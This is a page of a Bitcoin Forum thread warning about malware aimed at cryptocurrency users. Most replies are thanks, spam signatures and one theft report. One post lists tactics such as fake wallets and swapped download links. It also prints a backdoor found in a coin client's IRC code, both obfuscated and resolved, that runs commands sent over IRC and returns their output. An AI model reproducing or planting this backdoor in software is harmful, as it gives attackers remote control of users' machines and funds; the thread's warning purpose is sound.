Bitcoin Forum
October 17, 2019, 06:17:57 AM *
News: If you like a topic and you see an orange "bump" link, click it. More info.
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [18] 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 »
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 164057 times)
alttravel
Member
**
Offline Offline

Activity: 406
Merit: 21


View Profile
December 30, 2017, 02:17:31 PM
 #341

Thank you, really needed information. Security is a big issue here since lots of us are using hot wallet to trade on sometimes exotic platforms.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1571293077
Hero Member
*
Offline Offline

Posts: 1571293077

View Profile Personal Message (Offline)

Ignore
1571293077
Reply with quote  #2

1571293077
Report to moderator
icoDealDeckcom
Newbie
*
Offline Offline

Activity: 44
Merit: 0


View Profile WWW
December 31, 2017, 08:02:40 AM
 #342

Are you telling us that on bitcointalk.org we are likely to infect our computer by click on some link???

That is outrageous, if the community members can't be protected maybe this forum should be shut down.
sudnokpok
Full Member
***
Offline Offline

Activity: 406
Merit: 106



View Profile
December 31, 2017, 08:26:49 PM
 #343

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
emma46
Member
**
Offline Offline

Activity: 98
Merit: 10


View Profile
January 01, 2018, 10:52:11 AM
 #344

This is so true there are kinds of malware infections that can infiltrate our computers, let alone our very own wallets. We just need to be more keen when it comes to securing our beloved coins and making sure that they will not just vanish into thin air, the same with the efforts that we have put into our earnings.

Magister Magus
Member
**
Offline Offline

Activity: 329
Merit: 35


View Profile
January 01, 2018, 11:15:26 PM
 #345

This is bad, but this kind of information are precious and I think that the sharing of useful hints should be the main aim of this forum.
So, thank you very much for your advice.

▂▂▃▅▇ EVO - THE WORLD OF SELF-DEVELOPMENT ▇▅▃▂▂
MEDIUM    ●  LINKEDIN  ●TELEGRAM ◄  Blockchain platform for assessing and developing human skills  ▶ TWITTER  ● FACEBOOK  ●
WHITEPAPER
Cryptobel
Full Member
***
Offline Offline

Activity: 420
Merit: 100



View Profile
January 02, 2018, 07:40:37 AM
 #346

hacked wallet and took all tokens(((((now I sit and think what we've done wrong)thanks for the great article!!!

Shakurcrypto
Newbie
*
Offline Offline

Activity: 1
Merit: 0


View Profile WWW
January 02, 2018, 10:41:45 PM
 #347

Thanks
AHMADYTRADE
Newbie
*
Offline Offline

Activity: 3
Merit: 0


View Profile
January 02, 2018, 11:41:37 PM
 #348

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Yeah very useful forum thanks to all of you..greetings from venezuela.
coininvestor
Full Member
***
Offline Offline

Activity: 128
Merit: 100


View Profile
January 03, 2018, 02:50:44 PM
 #349

Are you telling us that on bitcointalk.org we are likely to infect our computer by click on some link???

That is outrageous, if the community members can't be protected maybe this forum should be shut down.

I had 113,026 ARDR worth about $209,000 stolen yesterday in this way.  Hackers wallet address  ARDOR-HKCS-V6N8-FH7T-A3SLF
Felics
Newbie
*
Offline Offline

Activity: 30
Merit: 0


View Profile
January 04, 2018, 12:25:50 AM
 #350

Great post
Cubanlinx81
Member
**
Offline Offline

Activity: 376
Merit: 11

CryptoRex


View Profile
January 04, 2018, 01:15:37 AM
 #351

Thank for the information. So many way that hackers are trying to steal our money. I will post and share this information to help others in the community stay safe while trading or online.
Stasnislav11
Member
**
Offline Offline

Activity: 294
Merit: 10


View Profile
January 04, 2018, 08:52:01 PM
 #352

a really good topic, often people start to think about the safety of their wallets when it's too late
GunsLair
Jr. Member
*
Offline Offline

Activity: 622
Merit: 1


View Profile
January 05, 2018, 02:50:03 PM
 #353

It is dangerous even for sites to go, not to mention the downloads )))
CryptoNews1
Newbie
*
Offline Offline

Activity: 98
Merit: 0


View Profile
January 08, 2018, 08:52:38 AM
 #354

Thanks for the info
Raul Lopez
Member
**
Offline Offline

Activity: 117
Merit: 10


View Profile WWW
January 08, 2018, 10:08:07 AM
 #355

For this reason a love Bitcointalk.org. Thank you!!

■ ■ ■ ■ ■ ■ ■ Find the best price of any book. Book finder and recommendator ■ ■ ■ ■ ■ ■ ■ Libreris
AllthewayUUppp
Newbie
*
Offline Offline

Activity: 84
Merit: 0


View Profile
January 08, 2018, 07:30:38 PM
 #356

Thanks for the sharing. I will be more secured from now and then.
bellanas
Member
**
Offline Offline

Activity: 392
Merit: 20


View Profile
January 09, 2018, 08:45:36 AM
 #357

Thanks for the info...I hope this forum will help me to save my money from scammers. Experience unfortunately was sad already.
Bugatti73
Member
**
Offline Offline

Activity: 616
Merit: 10


View Profile
January 10, 2018, 09:55:05 AM
 #358

Can you please explain how to protect yourself from attacks? Can I put Linux and not survive? or is there a threat anyway?
Wilsonong222
Jr. Member
*
Offline Offline

Activity: 131
Merit: 5


View Profile
January 11, 2018, 02:03:05 AM
 #359

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Hi there, I would like to ask if is safe to use incognito mode in goggle chrome. Or do I need to install software application that blocks the malware. Thanks in advance.

(((   BIDIUM.io   )))    PRE-ICO ACTIVE
█████████  JOIN NOW!  █████████
Hemady17
Member
**
Offline Offline

Activity: 350
Merit: 32

XETHER - BET ON HONESTY!!!


View Profile
January 11, 2018, 07:59:51 AM
 #360

Increasing malware infection is very unfortunate experience. But based on my experience everyone of us need to understand why are they're flourish even though We secure our system. Malware is a business for some people. From that perspective We should change our mind set. Do our best protect our interest. in our part we should increase our level of knowledge on how to fight the malware.

Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [18] 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 »
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!